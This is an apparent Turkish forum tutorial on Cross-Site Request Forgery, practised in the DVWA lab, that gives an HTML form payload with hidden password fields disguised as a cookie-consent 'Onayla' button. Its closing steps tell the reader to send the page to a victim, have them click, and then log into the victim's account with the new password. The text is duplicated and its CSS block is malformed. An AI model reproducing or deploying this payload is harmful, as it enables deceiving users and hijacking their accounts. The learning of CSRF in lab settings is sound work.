Merhabalar, Türkçe kaynağına az rastlanan CSRF(Cross Site Request Forgery/Siteler Arası İstek Sahteciliği) açığının nasıl istismar edilebileceğini göstereceğim. Bakalım bu CSRF açıkları nasıl istismar ediliyormuş.
Konu İçeriiği
➢ CSRF Nedir?
➢ CSRF Açığını İstismar Edelim
➢ CSRF Nedir?
Siteler Arası İstek Sahteciliği (CSRF), kullanıcıyı şu anda kimlik doğrulamasının yapıldığı bir web uygulamasında istenmeyen eylemler gerçekleştirmeye zorlayan bir saldırıdır. Küçük bir sosyal mühendislik yardımıyla (e-posta veya sohbet yoluyla bir bağlantı göndermek gibi) bir saldırgan, bir web uygulamasının kullanıcılarını, saldırganın seçtiği eylemleri gerçekleştirmeleri için kandırılan bir açık türüdür.
CSRF açığı kıritik düzeydedir.
➢ CSRF Açığını İstismar Edelim
1) İlk yapmamız gereken "localhostumuzu" başlatmak.
2) Localhostumuza bağlanarak "DVWA Labaratuvarını" açıyoruz.
3) Karşımıza gelen sekmede "CSRF" seçeneğini seçiyoruz.
4) Foruma sağ tık yaparak "Ögeyi incele" seçeneğine basıyoruz. Sonra karşımıza çıkan panelde videoda gösterdiğim işlemi yaparak "<form>...</form>" etiketlerini buluyoruz ve kopyalıyoruz.
5) Kopyaladığımız kodu aşağıdaki şekilde değiştiriyoruz.
6) Oluşturduğumuz kodu bir siteye entegre ederek kurbana yolluyoruz ve "Onayla" butonuna basmasını sağlıyoruz.
7) Sizin vermiş olduğunuz bilgiler ile kurbanın hesap şifreleri değişmiş oldu. Artık hesaba giriş sağlayabilirsiniz.
Yazılı açıklamayı anlamayanlar videoyu izleyebilirler.
[ame]https://www.youtube.com/watch?v=pySp7NwF8bY[/ame]
Konu İçeriiği
➢ CSRF Nedir?
➢ CSRF Açığını İstismar Edelim
➢ CSRF Nedir?
Siteler Arası İstek Sahteciliği (CSRF), kullanıcıyı şu anda kimlik doğrulamasının yapıldığı bir web uygulamasında istenmeyen eylemler gerçekleştirmeye zorlayan bir saldırıdır. Küçük bir sosyal mühendislik yardımıyla (e-posta veya sohbet yoluyla bir bağlantı göndermek gibi) bir saldırgan, bir web uygulamasının kullanıcılarını, saldırganın seçtiği eylemleri gerçekleştirmeleri için kandırılan bir açık türüdür.
CSRF açığı kıritik düzeydedir.
➢ CSRF Açığını İstismar Edelim
Öncelikle bir CSRF açıklı bir site bulmalıyız. Ben bunun için sanal labaratuvar ortamı kullanacağım(DVWA).
1) İlk yapmamız gereken "localhostumuzu" başlatmak.
2) Localhostumuza bağlanarak "DVWA Labaratuvarını" açıyoruz.
3) Karşımıza gelen sekmede "CSRF" seçeneğini seçiyoruz.
4) Foruma sağ tık yaparak "Ögeyi incele" seçeneğine basıyoruz. Sonra karşımıza çıkan panelde videoda gösterdiğim işlemi yaparak "<form>...</form>" etiketlerini buluyoruz ve kopyalıyoruz.
5) Kopyaladığımız kodu aşağıdaki şekilde değiştiriyoruz.
Kod:
<html>
<head>
</head>
<div>
<form action="Site adresi buraya yazılacak" method="GET"> <!-- csrf açığı olan site adresi direk kopyala yapıştır yapın -->
<input class="hidden" autocomplate="on" type="password" name="password_new" value="yenisifreyiburayayazin"> <!-- hidden kodunu kullanarak textboxı saklıyoruz. -->
<input class="hidden" type="password" autocomplete="off" name="password_conf" value="yenisifreyiburayayazin"><br>
Çerezler kullanımlaktadır <!-- bu metin sahte bir açıklama satırı olarak düşünebilirsiniz. Onayla butonuna bastığı anda şifre değişecek onun için inandırıcı bir açıklama yazın -->
<input type="submit" value="Onayla" name="Change"> <!-- Onayla kelimeside bildiğiniz butonun üzerinde yazan onayla kelimesi işte (: -->
</form>
</div>
*********
.hidden{
display:none;
}
</style>
</html>
6) Oluşturduğumuz kodu bir siteye entegre ederek kurbana yolluyoruz ve "Onayla" butonuna basmasını sağlıyoruz.
7) Sizin vermiş olduğunuz bilgiler ile kurbanın hesap şifreleri değişmiş oldu. Artık hesaba giriş sağlayabilirsiniz.
Yazılı açıklamayı anlamayanlar videoyu izleyebilirler.
[ame]https://www.youtube.com/watch?v=pySp7NwF8bY[/ame]
Son düzenleme: